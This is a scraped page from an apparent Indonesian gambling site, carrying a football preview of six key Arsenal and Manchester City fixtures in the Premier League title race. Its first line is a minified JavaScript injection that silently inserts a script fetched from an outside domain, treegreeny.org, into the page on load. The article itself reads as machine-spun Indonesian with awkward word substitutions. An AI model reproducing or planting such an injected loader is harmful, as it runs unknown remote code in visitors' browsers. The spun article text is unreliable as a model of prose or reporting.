;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 6 Pertandingan Tentukan Kompetisi Arsenal dan Man City Ke arah Gelar Juara Liga Inggris – SLOT MASA KINI

6 Pertandingan Tentukan Kompetisi Arsenal dan Man City Ke arah Gelar Juara Liga Inggris

0

MANTAP168. Saat Liga Inggris diteruskan sesudah interval internasional, Arsenal dan Manchester City akan ke arah tahapan akhir pemburuan gelar mereka.

The Gunners sekarang ini ada di muka, menggenggam keunggulan delapan point di pucuk klassemen sesudah 28 laga. Man City yang ada di urutan ke-2 mempunyai satu laga pada tangan dan bisa memotong jarak jadi lima point saat mereka melayani Liverpool pada 1 April.

Dari tersisa laga mereka, ke-2  team harus hadapi beberapa musuh yang mempunyai potensi merepotkan, dengan ke-2  pesaing itu akan sama-sama bertemu pada 26 April.

Berikut beberapa pertandingan penting yang perlu ditempuh ke-2  team ini dalam persaingan perebutan gelar:

Manchester City versus Liverpool (1 April)

Man City akan mainkan salah satunya rintangan paling besar mereka yang masih ada, saat mereka melayani team yang sudah jadi pesaing paling dekat mereka sepanjang musim-musim paling akhir.

Perform Liverpool sedang turun musim ini. Tetapi mereka masih tetap sanggup menaklukkan yang terbaik, seperti tundukkan Manchester United, 7-0, belakangan ini.

Mereka menang juga 1-0 dalam laga menantang team bimbingan Pep Guardiola. City menaklukkan Liverpool 3-2 di Etihad di Piala Carabao Desember lalu, tapi cuma sanggup bermain seri dalam dua laga liga kandang paling akhir mereka menantang The Reds.

Liverpool versus Arsenal (9 April)

Liverpool dapat mempunyai dampak besar dalam pemburuan gelar. Seminggu sesudah berkunjung ke Manchester City, mereka akan melayani Arsenal.

The North Londoners memenangi laga kandang 3-2 di bulan Oktober, tapi belum rasakan kemenangan di Anfield semenjak 2012. Dalam sembilan perjalanan selanjutnya untuk hadapi The Reds di gelaran Premier League, mereka kalah 7x dan seri 2x.

Bila Arsenal ingin cari ide, titel juara Liga Inggris 1989 mereka ditetapkan di Anfield, saat team pasukan bimbingan George Graham mencetak kemenangan mengagetkan 2-0 di laga paling akhir musim ini.

Manchester City versus Arsenal (April 26)

Laga ini pasti benar-benar mengisap perhatian yaitu saat ke-2  team berjumpa dalam laga penting dan secara efisien bisa putuskan siapakah yang memenangi gelar.

Man City sudah memenangi dua tatap muka awalnya musim ini. Mereka mencatat kemenangan 3-1 Liga Premier di Emirates di bulan Februari, beberapa minggu sesudah singkirkan Arsenal dari Piala FA dengan kemenangan kandang 1-0.

Pasukan Pep Guardiola tak pernah kalah dalam tujuh laga kandang liga paling akhir mereka menantang The Gunners, memenangi masing-masing dari 6 laga paling akhir.

Dapat dipikirkan panasnya tekanan laga yang sangat tentukan ini.

Arsenal versus Chelsea (29 April)

Arsenal hadapi derbi London dalam laga mereka, saat mereka melayani Chelsea cuma sekian hari sesudah laga mereka di kandang Man City.

The Blues sudah memenangi dua dari 3 laga Premier League paling akhir mereka di Emirates, Sementara team Mikel Arteta sudah membuat cara besar pada musim 2022/23, team London Barat itu kesusahan musim ini.

Sekarang ini ada di posisi kesepuluh, perform Chelsea sudah bertambah pada beberapa minggu paling akhir, dengan pasukan Graham Potter sekarang ini tak pernah kalah dalam empat laga. Bila perform mereka semakin meningkat, karena itu mereka bisa menyulitkan Arsenal. Newcastle versus Arsenal (6 Mei)

Arsenal akan bermain 4x pada bulan Mei dan mereka nampaknya harus jalani partai paling berat dalam laga pertama mereka pada bulan ini, saat berkunjung ke Newcastle.

The Magpies ada di posisi ke-5 dalam klassemen dan menggenggam dua laga pada tangan atas Tottenham yang ada di posisi ke-4 dan bermakna team Eddie Howe ini masih tetap konsentrasi untuk amankan tempat kwalifikasi Liga Champions.

Newcastle mempunyai pertahanan paling mengagumkan di seksi elite ini dengan kecolongan 19 kali di dalam 26 laga liga, jaga tujuh clean sheet dari 13 laga mereka di St James Park. Mikel Arteta harus memeras otak supaya beberapa penyerangnya dapat membobol gawang tuan-rumah.

Manchester City versus Chelsea (20 Mei)

Laga paling akhir City di Premier League musim ini ialah melayani Chelsea. Partai ini mempunyai potensi jadi penghambat Man City untuk menyikat gelar.

Salah satunya kekurangan yang ditemui The Citizens ialah masih tetap main di Piala FA dan Liga Champions. Sementara Arsenal telah tersingkir dari kejuaraan yang lain diturutinya. Mereka juga dapat seutuhnya fokus di Premier League.

Team Guardiola dapat mainkan putaran kedua semi-final Liga Champions pada tengah minggu saat sebelum laga ini bila mereka capai tahapan itu. Agenda yang ketat jadi musuh paling berat yang perlu ditangani City.

Leave a Reply

Your email address will not be published. Required fields are marked *